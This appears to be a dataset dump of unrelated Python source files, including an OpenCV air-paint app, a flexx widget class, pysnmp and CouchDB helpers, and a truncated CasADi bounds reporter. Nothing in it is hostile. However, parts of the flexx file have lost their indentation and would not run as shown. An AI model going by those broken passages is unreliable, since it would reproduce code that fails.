content stringlengths 5 1.05M |
|---|
from ._BoxBoundsCoercion import BoxBoundsCoercion
from ._Coercion import Coercion
from ._MaskBoundsCoercion import MaskBoundsCoercion
|
class TrainingState:

    def __init__(self):
        """
        Mutable bag of training-loop state handed to callbacks.
        """
        # Epoch / batch counters, incremented by the training loop.
        self.current_epoch = 0
        self.current_batch = 0
        # True while training, False while evaluating.
        self.training_mode = True
        # Tensorboard logger instance, if any is attached.
        self.tensorboard_logger = None
        # Timing averages (data fetch only vs. fetch + processing).
        self.average_data_loading_time = 0
        self.average_batch_processing_time = 0
        # Number of samples in each split.
        self.training_data_size = 0
        self.validation_data_size = 0
        # Per-loss-name average losses for each split.
        self.validation_average_losses = {}
        self.training_average_losses = {}
        # Summed average loss per split; starts at +inf so any real
        # value counts as an improvement.
        self.validation_average_loss = float('Inf')
        self.training_average_loss = float('Inf')
        # Most recent prediction, network input and target.
        self.last_prediction = None
        self.last_network_input = None
        self.last_target = None
        # The network being optimized.
        self.model = None
# -*- coding: iso-8859-1 -*-
"""
MoinMoin - makecache script
@copyright: 2008 MoinMoin:ReimarBauer
@license: GNU GPL, see COPYING for details.
"""
from MoinMoin import caching
from MoinMoin.Page import Page
from MoinMoin.script import MoinScript
from MoinMoin.stats import hitcounts
class PluginScript(MoinScript):
    """\
    Purpose:
    ========
    This script allows you to create cache files in data/pages/PageName/cache/
    and /data/cache directories
    You will usually do this after changing MoinMoin code and calling "maint cleancache", by either upgrading
    version, installing or removing macros.
    text_html is the name of the cache file used for compiled pages formatted
    by the wiki text to html formatter.
    Detailed Instructions:
    ======================
    General syntax: moin [options] maint makecache
    [options] usually should be:
    --config-dir=/path/to/my/cfg/ --wiki-url=http://wiki.example.org/
    """

    def __init__(self, argv, def_values):
        MoinScript.__init__(self, argv, def_values)

    def mainloop(self):
        # Iterate every existing page and parse it once; getPageLinks()
        # fills the per-page cache as a side effect of parsing.
        self.init_request()
        request = self.request
        # make cache related to pagelinks entries of a page
        pages = request.rootpage.getPageList(user='', exists=1)
        for pagename in pages:
            page = Page(request, pagename)
            request.page = page
            # Return value intentionally unused — the call is made purely
            # for its cache-warming side effect.
            p = page.getPageLinks(request)
|
from typing import Dict, Optional
from asyncpg.exceptions import UniqueViolationError
from app.database.schema import User, UserToken
async def get_user(query: Dict) -> Optional[User]:
    """Fetch a single user matching *query*, or None when absent."""
    return await User.objects.get_or_none(**query)
async def create_user(user) -> Optional[User]:
    """Insert a new user row plus its token row.

    Returns the created User, or None when a unique constraint (e.g. a
    duplicate key) is violated during creation.
    """
    try:
        created = await User.objects.create(**user)
        await UserToken.objects.create(user=created)
        return created
    except UniqueViolationError:
        return None
|
#importing the libraries
import numpy as np
import cv2
from collections import deque
from color_selector import color_detector
import time
import os
#from record import last_frame
# calling the colour function: opens the "Color detectors" trackbar
# window that the main loop reads the pointer HSV range from.
color_detector()
# color_arr()

# One list of strokes per pen colour; each stroke is a deque of points,
# bounded to 512 points.
bpoints = [deque(maxlen = 512)]
gpoints = [deque(maxlen = 512)]
ypoints = [deque(maxlen = 512)]
rpoints = [deque(maxlen = 512)]
# Now to mark the pointers in the above colour array we introduce some
# index values which would mark their positions (index of the stroke
# currently being drawn, per colour).
blue_index = 0
green_index = 0
yellow_index = 0
red_index = 0
# The kernel is used for dilation of contour
kernel = np.ones((5, 5))
# The ink colours (BGR order) for the drawing purpose
# NOTE(review): yellow is (0, 225, 255) — 225 looks like a typo for 255;
# confirm against the intended palette.
colors = [(255, 0, 0), (0, 255, 0), (0, 225, 255), (0, 0, 255)]
colorIndex = 0
# Setting up the drawing board AKA The canvas (white, 471x636)
paintWindow = np.zeros((471, 636, 3)) + 255
cv2.namedWindow('Paint', cv2.WINDOW_AUTOSIZE)
# loading the installed/attached camera of the device
cap = cv2.VideoCapture(0)
def recognize():
    """Train a kNN classifier on OpenCV's bundled handwritten-digits
    sheet and print its accuracy on a held-out half of the data.

    Expects 'digits.png' (a 100x50 grid of 20x20-pixel digit cells) in
    the working directory.
    """
    # BUG FIX: this function referenced the undefined name `cv`; the
    # module imports OpenCV as `cv2`.
    img = cv2.imread('digits.png')
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # Now we split the image to 5000 cells, each 20x20 size
    cells = [np.hsplit(row, 100) for row in np.vsplit(gray, 50)]
    # Make it into a Numpy array: its size will be (50,100,20,20)
    x = np.array(cells)
    # Left half of each row -> training data, right half -> test data
    train = x[:, :50].reshape(-1, 400).astype(np.float32)  # Size = (2500,400)
    test = x[:, 50:100].reshape(-1, 400).astype(np.float32)  # Size = (2500,400)
    # Create labels for train and test data: digits 0..9, 250 samples each
    k = np.arange(10)
    train_labels = np.repeat(k, 250)[:, np.newaxis]
    test_labels = train_labels.copy()
    # Initiate kNN, train it on the training data, then classify the
    # test data using the 5 nearest neighbours.
    knn = cv2.ml.KNearest_create()
    knn.train(train, cv2.ml.ROW_SAMPLE, train_labels)
    ret, result, neighbours, dist = knn.findNearest(test, k=5)
    # Accuracy = percentage of predictions matching the ground truth.
    matches = result == test_labels
    correct = np.count_nonzero(matches)
    accuracy = correct * 100.0 / result.size
    print(accuracy)
# Main capture/draw loop: track the coloured pointer, let the user pick a
# pen colour or clear the canvas via on-screen buttons, and draw the
# accumulated strokes on both the live frame and the canvas.
while True:
    # Reading the camera frame
    ret, frame = cap.read()
    # For saving
    # out = cv2.VideoWriter("Paint-Window.mp4", cv2.VideoWriter_fourcc(*'XVID'), 1, (frame.shape[1], frame.shape[0]))
    # Flipping the frame to see same side of the user
    frame = cv2.flip(frame, 1)
    hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
    # Getting the new positions of the trackbar and setting the new HSV values
    u_hue = cv2.getTrackbarPos("Upper Hue", "Color detectors")
    u_saturation = cv2.getTrackbarPos("Upper Saturation", "Color detectors")
    u_value = cv2.getTrackbarPos("Upper Value","Color detectors")
    l_hue = cv2.getTrackbarPos("Lower Hue", "Color detectors")
    l_saturation = cv2.getTrackbarPos("Lower Saturation", "Color detectors")
    l_value = cv2.getTrackbarPos("Lower Value", "Color detectors")
    Upper_hsv = np.array([u_hue, u_saturation, u_value])
    Lower_hsv = np.array([l_hue, l_saturation, l_value])
    # Adding the colour buttons to the live frame to choose color
    frame = cv2.rectangle(frame, (35, 1), (135, 65), (122, 122, 122), -1)
    frame = cv2.rectangle(frame, (160, 1), (255, 65), (255, 0, 0), -1)
    frame = cv2.rectangle(frame, (275, 1), (370, 65), (0, 255, 0), -1)
    frame = cv2.rectangle(frame, (390, 1), (485, 65), (0, 255, 255), -1)
    frame = cv2.rectangle(frame, (505, 1), (600, 65), (0, 0, 255), -1)
    cv2.putText(frame, "Clear All", (55, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), 2, cv2.LINE_AA)
    cv2.putText(frame, "Blue Color", (175, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), 2, cv2.LINE_AA)
    cv2.putText(frame, "Green Color", (285, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), 2, cv2.LINE_AA)
    cv2.putText(frame, "Yellow Color", (400, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (150, 150, 150), 2, cv2.LINE_AA)
    cv2.putText(frame, "Red Color", (520, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), 2, cv2.LINE_AA)
    # masking out the pointer for it's identification in the frame
    Mask = cv2.inRange(hsv, Lower_hsv, Upper_hsv)
    Mask = cv2.erode(Mask, kernel, iterations = 1)
    Mask = cv2.morphologyEx(Mask, cv2.MORPH_OPEN, kernel)
    Mask = cv2.dilate(Mask, kernel, iterations = 1)
    # Now contouring the pointers post identification
    # NOTE(review): the 2-value unpacking assumes the OpenCV 2.x/4.x
    # findContours API; OpenCV 3.x returns 3 values — confirm the
    # targeted OpenCV version.
    countours, _ = cv2.findContours(Mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    centre = None
    # If there are any contours formed
    if len(countours) > 0:
        # sorting the contours for the biggest
        countour = sorted(countours, key = cv2.contourArea, reverse = True)[0]
        # Get the radius of the cirlce formed around the found contour
        ((x, y), radius) = cv2.minEnclosingCircle(countour)
        # Drawing the circle boundary around the contour
        cv2.circle(frame, (int(x), int(y)), int(radius), (0, 255, 255), 2)
        # Calculating the centre of the detected contour
        # NOTE(review): M['m00'] can be zero for a degenerate contour,
        # which would raise ZeroDivisionError here — confirm.
        M = cv2.moments(countour)
        centre = (int(M['m10'] / M['m00']), int(M['m01'] / M['m00']))
        # Now checking if the user clicked on another button on the screen (the 4 buttons that were mentioned Y,G,B,R and clear all)
        if centre[1] <= 65:
            # Clear Button: reset every stroke list, stroke index and the canvas
            if 35 <= centre[0] <= 135:
                bpoints = [deque(maxlen = 512)]
                gpoints = [deque(maxlen = 512)]
                ypoints = [deque(maxlen = 512)]
                rpoints = [deque(maxlen = 512)]
                blue_index = 0
                green_index = 0
                yellow_index = 0
                red_index = 0
                paintWindow[67:, :, :] = 255
            elif 160 <= centre[0] and centre[0] <= 255:
                colorIndex = 0 # Blue
            elif 275 <= centre[0] and centre[0] <= 370:
                colorIndex = 1 # Green
            elif 390 <= centre[0] and centre[0] <= 485:
                colorIndex = 2 # Yellow
            elif 505 <= centre[0] and centre[0] <= 600:
                colorIndex = 3 # Red
        else :
            # Pointer is inside the drawing area: extend the current
            # stroke of the selected colour.
            if colorIndex == 0:
                bpoints[blue_index].appendleft(centre)
            elif colorIndex == 1:
                gpoints[green_index].appendleft(centre)
            elif colorIndex == 2:
                ypoints[yellow_index].appendleft(centre)
            elif colorIndex == 3:
                rpoints[red_index].appendleft(centre)
    # Appending the next deques if nothing is detected, so the next
    # detection starts a fresh stroke instead of joining the old one.
    else:
        bpoints.append(deque(maxlen = 512))
        blue_index += 1
        gpoints.append(deque(maxlen = 512))
        green_index += 1
        ypoints.append(deque(maxlen = 512))
        yellow_index += 1
        rpoints.append(deque(maxlen = 512))
        red_index += 1
    # Drawing the lines of every colour on the canvas and the track frame window
    points = [bpoints, gpoints, ypoints, rpoints]
    for i in range(len(points)):
        for j in range(len(points[i])):
            for k in range(1, len(points[i][j])):
                if points[i][j][k - 1] is None or points[i][j][k] is None:
                    continue
                cv2.line(frame, points[i][j][k - 1], points[i][j][k], colors[i], 25)
                cv2.line(paintWindow, points[i][j][k - 1], points[i][j][k], colors[i], 25)
    # 'f' saves the current canvas to disk.
    key = cv2.waitKey(1)
    if key & 0xFF == ord('f'):
        cv2.imwrite("last_frame.jpg", paintWindow)
    # Displaying/running all the 3 windows
    cv2.imshow("Live Tracking", frame)
    cv2.imshow("Paint", paintWindow)
    cv2.imshow("mask", Mask)
    # For quitting/breaking the loop - press and hold ctrl+q twice
    if cv2.waitKey(1) & 0xFF == ord("q"):
        break
    # out.write(frame)
    # last_frame()
# out.release()
# Releasing the camera and all the other resources of the device
cap.release()
cv2.destroyAllWindows()
"""
.. UIExample:: 100
from flexx import app, ui
# A red widget
class Example(ui.Widget):
CSS = ".flx-example {background:#f00; min-width: 20px; min-height:20px}"
"""
import json
import threading
from .. import react
from ..app import Pair, get_instance_by_id
from ..app.serialize import serializer
def _check_two_scalars(name, v):
if not (isinstance(v, (list, tuple)) and
isinstance(v[0], (int, float)) and
isinstance(v[1], (int, float))):
raise ValueError('%s must be a tuple of two scalars.' % name)
return float(v[0]), float(v[1])
# Keep track of stack of default parents when using widgets
# as context managers. Have one list for each thread.
_default_parents_per_thread = {} # dict of threadid -> list
def _get_default_parents():
""" Get list that represents the stack of default parents.
Each thread has its own stack.
"""
# Get thread id
if hasattr(threading, 'current_thread'):
tid = id(threading.current_thread())
else:
tid = id(threading.currentThread())
# Get list of parents for this thread
return _default_parents_per_thread.setdefault(tid, [])
class Widget(Pair):
    """ Base widget class.

    In HTML-speak, this represents a plain div-element. Not very useful
    on itself, except perhaps to fill up space. Subclass to create
    something interesting.

    When *subclassing* a Widget to create a compound widget (a widget
    that serves as a container for other widgets), use the ``init()``
    method to initialize child widgets. This method is called while
    the widget is the current widget (i.e. the default parent).

    When subclassing to create a custom widget use the ``_init()``
    method both for the Python and JS version of the class.
    """
    def __init__(self, **kwargs):
        """Create the widget.

        Accepted kwargs include ``parent`` (a Widget or None); remaining
        kwargs are forwarded to ``Pair.__init__`` as signal values.
        """
        # todo: -> parent is widget or ref to div element
        parent = kwargs.pop('parent', None)
        # Apply default parent? (set by an enclosing ``with widget:``)
        if parent is None:
            default_parents = _get_default_parents()
            if default_parents:
                parent = default_parents[-1]
        # Use parent proxy unless proxy was given
        if parent is not None and not kwargs.get('_proxy', None):
            kwargs['proxy'] = parent.proxy
        # Provide css class name to JS: one 'flx-xxx' class per class in
        # the instance's mro; the slice keeps the subclass chain down to
        # and including Widget, dropping Pair and below.
        classes = ['flx-' + c.__name__.lower() for c in self.__class__.mro()]
        classname = ' '.join(classes[:1-len(Widget.mro())])
        # Pass properties via kwargs
        kwargs['_css_class_name'] = classname
        kwargs['parent'] = parent
        Pair.__init__(self, **kwargs)
        # Run init() with this widget as the current default parent.
        with self:
            self.init()
        # Signal dependencies may have been added during init(), also in JS
        self.connect_signals(False)
        cmd = 'flexx.instances.%s.connect_signals(false);' % self._id
        self._proxy._exec(cmd)
def _repr_html_(self):
""" This is to get the widget shown inline in the notebook.
"""
if self.container_id():
return "<i>This widget is already shown in this notebook</i>"
container_id = self.id + '_container'
def set_cointainer_id():
self.container_id._set(container_id)
# Set container id, this gets applied in the next event loop
# iteration, so by the time it gets called in JS, the div that
# we define below will have been created.
from ..app import call_later
call_later(0.1, set_cointainer_id) # todo: always do calls in next iter
return "<div class='flx-container' id=%s />" % container_id
    def init(self):
        """ Overload this to initialize a custom widget. Inside, this
        widget is the current parent (so child widgets created here are
        parented to it automatically).
        """
        pass
def disconnect_signals(self, *args):
""" Overloaded version of disconnect_signals() that will also
disconnect the signals of any child widgets.
"""
children = self.children()
Pair.disconnect_signals(self, *args)
for child in children:
child.disconnect_signals(*args)
    def __enter__(self):
        # Entering the widget context makes it the default parent for
        # any widgets created inside the block.
        # Note that __exit__ is guaranteed to be called, so there is
        # no need to use weak refs for items stored in default_parents
        default_parents = _get_default_parents()
        default_parents.append(self)
        return self

    def __exit__(self, type, value, traceback):
        default_parents = _get_default_parents()
        # The widget being popped must be the one pushed in __enter__.
        assert self is default_parents.pop(-1)
        #if value is None:
        #    self.update()
    @react.source
    def container_id(v=''):
        """ The id of the DOM element that contains this widget if
        parent is None.
        """
        return str(v)

    @react.input
    def parent(v=None):
        """ The parent widget, or None if it has no parent.
        """
        if v is None or isinstance(v, Widget):
            return v
        else:
            raise ValueError('parent must be a widget or None')

    # Note that both the Py and JS have their own children signal
    # todo: prevent unnecessary updates
    @react.source
    def children(v=()):
        """ The child widgets of this widget.
        """
        assert all([isinstance(w, Widget) for w in v])
        return tuple(v)

    @react.input
    def flex(v=0):
        """ How much space this widget takes when contained in a layout.
        A flex of 0 means to take the minimum size.
        """
        return float(v)

    @react.input
    def pos(v=(0, 0)):
        """ The position of the widget when it is in a layout that
        allows positioning.
        """
        return _check_two_scalars('pos', v)

    @react.input
    def size(v=(0, 0)):
        """ The size of the widget when it is in a layout that allows
        positioning.
        """
        return _check_two_scalars('size', v)

    @react.input
    def min_size(v=(0, 0)):
        """ The minimum size of the widget.
        """
        return _check_two_scalars('min_size', v)

    @react.input
    def bgcolor(v=''):
        """ Background color of the widget. In general it is better to do
        styling via CSS.
        """
        return str(v)

    # todo: can we calculate this in JS somehow?
    @react.input
    def _css_class_name(self, v=''):
        # Full CSS class string for the widget's DOM node; the main app
        # widget additionally receives the 'flx-main-widget' class.
        v = str(v)
        if getattr(self, '_IS_APP', False):  # set when a widget is made into an app
            v = 'flx-main-widget ' + v
        return v
    @react.connect('parent')
    def _parent_changed_py(self, new_parent):
        # Keep the old and new parents' `children` signals in sync when
        # this widget is re-parented (Python side).
        old_parent = self.parent.last_value
        if old_parent is not None:
            children = list(old_parent.children()[:])
            while self in children:
                children.remove(self)
            old_parent.children._set(children)
        if new_parent is not None:
            children = list(new_parent.children()[:])
            children.append(self)
            new_parent.children._set(children)

    # Default CSS for all widgets: .flx-container is the placeholder div
    # (e.g. in a notebook), .flx-main-widget fills the page.
    CSS = """
    .flx-container {
        min-height: 10px; /* splitter sets its own minsize if contained */
    }
    .flx-widget {
        box-sizing: border-box;
        white-space: nowrap;
        overflow: hidden;
    }
    .flx-main-widget {
        width: 100%;
        height: 100%;
    }
    """
    # Transpiled-to-JavaScript half of Widget; runs in the browser.
    # NOTE(review): this is PyScript, not plain Python — names like
    # `this`, `document`, `window`, `setTimeout` and `undefined` are
    # resolved after transpilation, not by the Python interpreter.
    class JS:

        def _init(self):
            self._create_node()
            flexx.get('body').appendChild(this.node)
            # todo: allow setting a placeholder DOM element, or any widget parent
            # Create closure to check for size changes
            self._stored_size = 0, 0
            self._checking_size = False
            that = this

            def _check_resize():
                # Re-raise in next event loop iteration; the flag
                # coalesces multiple requests into one check.
                if not that._checking_size:
                    setTimeout(_check_resize_now, 0.001)
                that._checking_size = True

            def _check_resize_now():
                that._checking_size = False
                node = that.node
                widthChanged = (that._stored_size[0] != node.offsetWidth)
                heightChanged = (that._stored_size[1] != node.offsetHeight)
                if widthChanged or heightChanged:
                    that.actual_size._set([node.offsetWidth, node.offsetHeight])
            self._check_resize = _check_resize
            self._check_resize()
            super()._init()

        # @react.source
        # def children(v=()):
        #     """ The child widgets of this widget.
        #     """
        #     for w in v:
        #         if not isinstance(w, flexx.classes.Widget):
        #             raise ValueError('Children should be Widget objects.')
        #     return v

        @react.source
        def actual_size(v=(0, 0)):
            """ The real (actual) size of the widget.
            """
            return v[0], v[1]

        def _create_node(self):
            this.node = document.createElement('div')

        @react.connect('_css_class_name')
        def _css_class_name_changed(self, v):
            this.node.className = v

        def _add_child(self, widget):
            """ Add the DOM element. Called right after the child widget is added. """
            # May be overloaded in layout widgets
            self.node.appendChild(widget.node)

        def _remove_child(self, widget):
            """ Remove the DOM element. Called right after the child widget is removed. """
            self.node.removeChild(widget.node)

        @react.connect('parent')
        def _parent_changed(self, new_parent):
            # JS-side mirror of _parent_changed_py, additionally moving
            # the DOM node between parents.
            old_parent = self.parent.last_value
            if old_parent is not None and old_parent is not undefined:
                children = old_parent.children()[:]
                while self in children:
                    children.remove(self)
                old_parent.children._set(children)  # we set it directly
                old_parent._remove_child(self)
            if new_parent is not None:
                children = new_parent.children()[:]
                children.append(self)
                new_parent.children._set(children)
                new_parent._add_child(self)

        @react.connect('parent.actual_size')
        def _keep_size_up_to_date1(self, size):
            #print(self._id, 'resize 1', size)
            self._check_resize()

        @react.connect('parent', 'container_id')
        def _keep_size_up_to_date2(self, parent, id):
            #print(self._id, 'resize2 ', parent, id)
            # Root widgets (no parent) listen to window resizes instead
            # of their parent's size signal.
            if parent is None:
                window.addEventListener('resize', self._check_resize, False)
            else:
                window.removeEventListener('resize', self._check_resize, False)
            self._check_resize()

        @react.connect('pos')
        def _pos_changed(self, pos):
            # Values > 1 are treated as pixels, <= 1 as fractions (%).
            self.node.style.left = pos[0] + "px" if (pos[0] > 1) else pos[0] * 100 + "%"
            self.node.style.top = pos[1] + "px" if (pos[1] > 1) else pos[1] * 100 + "%"

        @react.connect('size')
        def _size_changed(self, size):
            size = size[:]
            for i in range(2):
                if size[i] == 0 or size is None or size is undefined:
                    size[i] = ''  # Use size defined by CSS
                elif size[i] > 1:
                    size[i] = size[i] + 'px'
                else:
                    # NOTE(review): fractional sizes are scaled by 100 but
                    # suffixed 'px' here, unlike _pos_changed which uses
                    # '%' — confirm whether '%' was intended.
                    size[i] = size[i] * 100 + 'px'
            self.node.style.width = size[0]
            self.node.style.height = size[1]

        @react.connect('bgcolor')
        def _bgcolor_changed(self, color):
            self.node.style['background-color'] = color

        @react.connect('container_id')
        def _container_id_changed(self, id):
            # Attach the node to the container div created by
            # _repr_html_ (notebook inline display).
            #if self._parent:
            #    return
            if id:
                el = document.getElementById(id)
                el.appendChild(this.node)

    ## Children and parent
    # @property
    # def children(self):
    #     return self._children
    #
    # def _add_child(self, widget):
    #     pass # special hook to introduce a child inside this widget
    #
    # def _remove_child(self, widget):
    #     pass # special hook to remove a child out from this widget
    #
    #
    # @react.connect('parent')
    # def _parent_changed(self, new_parent):
    #     old_parent = self.parent.previous_value
    #     if old_parent is not None:
    #         children = list(old_parent.children())
    #         while self in children:
    #             children.remove(self)
    #         #old_parent._set_prop('children', children) # bypass readonly
    #         old_parent.children._set(children)
    #         old_parent._remove_child(self)
    #     if new_parent is not None:
    #         children = list(new_parent.children())
    #         children.append(self)
    #         #new_parent._set_prop('children', children)
    #         new_parent.children._set(children)
    #         new_parent._add_child(self)
|
from django.contrib import admin
from .models import Note
@admin.register(Note)
class NoteAdmin(admin.ModelAdmin):
    """Register the Note model with the Django admin.

    No customisation yet; the stock ModelAdmin behaviour is used.
    """
    pass
from hyperlpr_py3 import pipline as pp
import hyperlpr_py3.config as hyperConfig
import cv2
import sys
import os
# Global debug flag and detection-test paths, read once from the shared
# hyperlpr configuration.
debugInfo = hyperConfig.configuration["global"]["debug"]
testPath = hyperConfig.configuration["detectTest"]["detectPath"]
outPath = hyperConfig.configuration["detectTest"]["outputPath"]
def detectPlateTest(filepath):
    """Run end-to-end plate recognition on every image in *filepath*.

    Processes .jpg/.JPG/.png files; when the global debug flag is set,
    writes the annotated result to ``outPath/<name>/out_<name>.png``.
    """
    for filename in os.listdir(filepath):
        # Tuple form of endswith: one call instead of an or-chain.
        if filename.endswith((".jpg", ".JPG", ".png")):
            fileFullPath = os.path.join(filepath, filename)
            image = cv2.imread(fileFullPath)
            print(fileFullPath)
            image_c = image.copy()
            image_c, res = pp.SimpleRecognizePlateByE2E(image_c)
            # Output folder name: text before the first dot of the file name.
            pathName = filename.split('.')[0]
            if debugInfo:
                # makedirs(exist_ok=True) replaces the racy
                # `exists() == False` check followed by mkdir().
                os.makedirs(os.path.join(outPath, pathName), exist_ok=True)
                cv2.imwrite(os.path.join(outPath, pathName, "out_" + pathName + ".png"), image_c)


if __name__ == "__main__":
    detectPlateTest(testPath)
|
'''
from pysnmp.hlapi import *
errorIndication, errorStatus, errorIndex, varBinds = next(
setCmd(SnmpEngine(),
CommunityData('public'),
UdpTransportTarget(('192.168.61.6', 161)),
ContextData(),
ObjectType(ObjectIdentity('LUXL-POE-MIB', 'luxlPoeConfigInterfaceParamMode', 1000001).addAsn1MibSource('file:///Users/michaelhelton/Downloads/LUXL_MIBs_ALL/LUXL-POE-MIB.mib'),2))
)
if errorIndication:
print(errorIndication)
elif errorStatus:
print('%s at %s' % (errorStatus.prettyPrint(),
errorIndex and varBinds[int(errorIndex) - 1][0] or '?'))
else:
for varBind in varBinds:
print(' = '.join([x.prettyPrint() for x in varBind]))
'''
from pysnmp.hlapi import *
from pysnmp.hlapi import UsmUserData
# SNMPv3 SET: write value 2 to luxlPoeConfigInterfaceParamMode for
# interface index 1000001, loading the vendor MIB from a local file.
# NOTE(review): host, user and authKey are hard-coded — move them to
# configuration/environment before any non-lab use.
errorIndication, errorStatus, errorIndex, varBinds = next(
    setCmd(SnmpEngine(),
           UsmUserData('user',authKey='password'),
           UdpTransportTarget(('192.168.61.6', 161)),
           ContextData(),
           ObjectType(ObjectIdentity('LUXL-POE-MIB', 'luxlPoeConfigInterfaceParamMode', 1000001).addAsn1MibSource('file:///Users/michaelhelton/Downloads/LUXL_MIBs_ALL/LUXL-POE-MIB.mib'),2))
)
# Report transport-level errors, per-PDU errors, or the returned varbinds.
if errorIndication:
    print(errorIndication)
elif errorStatus:
    print('%s at %s' % (errorStatus.prettyPrint(),
                        errorIndex and varBinds[int(errorIndex) - 1][0] or '?'))
else:
    for varBind in varBinds:
        print(' = '.join([x.prettyPrint() for x in varBind]))
"""
Provide CouchDB utility functions.
"""
import os
import yaml
import couchdb
from cloudly.decorators import Memoized
import cloudly.logger as logger
from cloudly.aws import ec2
log = logger.init(__name__)
@Memoized
def get_server(hostname=None, port=None, username=None, password=None,
               protocol=None):
    """Return a server instance (memoized across calls).

    The following heuristic is used to find the server:
        - function arguments take precedence over all else,
        - environment variable COUCHDB_HOST is used otherwise,
        - use the service finder of cloudly.aws.ec2 to look up a couchdb
          server if none was found so far,
        - else use 127.0.0.1

    Protocol, port and credentials likewise fall back to the
    COUCHDB_PROTOCOL / COUCHDB_PORT / COUCHDB_USERNAME /
    COUCHDB_PASSWORD environment variables.
    """
    host = (
        hostname or
        os.environ.get("COUCHDB_HOST") or
        ec2.get_hostname("couchdb") or
        "127.0.0.1"
    )
    protocol = protocol or os.environ.get("COUCHDB_PROTOCOL", "http")
    # Default port follows the protocol: 443 for https, 5984 otherwise.
    port = port or os.environ.get("COUCHDB_PORT",
                                  443 if protocol == "https" else 5984)
    username = username or os.environ.get("COUCHDB_USERNAME", None)
    password = password or os.environ.get("COUCHDB_PASSWORD", None)
    # Embed credentials in the URL only when both are provided.
    if username is not None and password is not None:
        url = "{protocol}://{username}:{password}@{host}:{port}".format(
            protocol=protocol,
            host=host,
            port=port,
            username=username,
            password=password,
        )
        log.info("{} port {}, authenticated".format(host, port))
    else:
        url = "{protocol}://{host}:{port}".format(
            protocol=protocol,
            host=host,
            port=port,
        )
        log.info("{} port {}".format(host, port))
    return couchdb.Server(url)
def get_or_create(server, database_name):
    """Return the named database, creating it when it does not exist."""
    try:
        return server[database_name]
    except couchdb.http.ResourceNotFound:
        return server.create(database_name)
def sync_design_doc(database, design_filename):
    """Sync a design document written as a YAML file.

    Replaces any existing document with the same ``_id``.
    """
    with open(design_filename) as design_file:
        # safe_load: design docs are plain data; yaml.load without an
        # explicit Loader is deprecated and can construct arbitrary
        # Python objects from untrusted input.
        design_doc = yaml.safe_load(design_file)
        # Delete old document, to avoid ResourceConflict exceptions.
        old = database.get(design_doc['_id'])
        if old:
            database.delete(old)
        database.save(design_doc)
def update_feed(database_name, include_docs=False):
    """Return a continuous feed of changes to the database, starting at
    the current update sequence (i.e. only the most recent changes).
    """
    database = get_server()[database_name]
    current_seq = database.info()['update_seq']
    return database.changes(feed='continuous',
                            include_docs=include_docs,
                            since=current_seq)
|
#
# This file is part of CasADi.
#
# CasADi -- A symbolic framework for dynamic optimization.
# Copyright (C) 2010-2014 Joel Andersson, Joris Gillis, Moritz Diehl,
# K.U. Leuven. All rights reserved.
# Copyright (C) 2011-2014 Greg Horn
#
# CasADi is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# CasADi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with CasADi; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
#
from casadi import *
from numpy import Inf
def reportBounds(value,lowerbound,upperbound,labels=None,tol=1e-8,showNonViolating=True):
    """Print a human-readable report of how each entry of `value` sits
    within its [lowerbound, upperbound] interval.

    value/lowerbound/upperbound: matrices with matching nonzero layouts.
    labels: optional per-entry names, or an object exposing .labels().
    tol: tolerance for violation detection and for treating lb == ub as
         an equality constraint.
    showNonViolating: when False, only violated or non-regular entries
         are printed.
    """
    # Accept objects (e.g. variable collections) that carry their own labels.
    if hasattr(labels,"labels"):
        labels = labels.labels()
    v = list(value.nonzeros())
    lb = list(lowerbound.nonzeros())
    ub = list(upperbound.nonzeros())
    if labels is None:
        labels = [""] * len(v)
    if not(len(v)==len(lb) and len(lb)==len(ub)):
        raise Exception("value, lowerbound and upperbound must all be the same size, but got %d, %d and %d. " % (len(v),len(lb),len(ub)))
    if len(labels)!=len(v):
        raise Exception("Labels (%d) must be same size as values (%d)" % (len(labels),len(v)))
    if ( all(value <= upperbound + tol) and all(value >= lowerbound - tol) ):
        print("All %d bounds are met: " % value.size())
    else:
        print("Problem with bounds : ")
    print("-"*60)
    # The length of the numeric fields
    fieldlength = 10
    # The length of the constraint visualizer strip
    indicator_length = 15
    # Loop over the elements of value
    for i in range(value.size()):
        violated = (v[i] > (ub[i] + tol) or v[i] < (lb[i] - tol))
        nonregular = not is_regular([v[i]])
        if not(showNonViolating) and not(violated) and not(nonregular):
            continue
        # NOTE(review): `labels` can no longer be None here (it was
        # replaced above), so this branch is dead code.
        if labels is None:
            identifier = "%d." % i
        else:
            identifier = labels[i]
        # Equality constraint: lb == ub (within tol).
        if ( abs(lb[i] - ub[i])<=tol):
            midfield = "%*s == %*s " % (fieldlength, "%.7e" % lb[i], fieldlength, "%.7e" % v[i])
            indicator = ""
        else:
            # Build an ASCII gauge: the endpoint chars mark each bound as
            # unbounded ('8'), active ('X') or inactive ('o'); '=' marks
            # where the value sits between the bounds.
            indicator = "-" * indicator_length
            # NOTE(review): comparing the *lower* bound against +Inf looks
            # suspicious — presumably -Inf (unbounded below) was intended;
            # confirm against upstream CasADi.
            if lb[i]==Inf:
                indicator = "8" + indicator
            elif (abs(v[i]-lb[i])<=tol):
                indicator = "X" + indicator
            else:
                indicator = "o" + indicator
            if ub[i]==Inf:
                indicator += "8"
            elif (abs(v[i]-ub[i])<=tol):
                indicator += "X"
            else:
                indicator += "o"
            # Place the '=' marker proportionally between the bounds.
            if (v[i] <= (ub[i] + tol) and v[i] >= (lb[i] - tol)):
                index = (v[i]-lb[i])/(ub[i]-lb[i])*(indicator_length-1)
                index = min(max(0,index),indicator_length-1)
                index = int(index)
                indicator = indicator[:1+index] + '=' + indicator[1+index:]
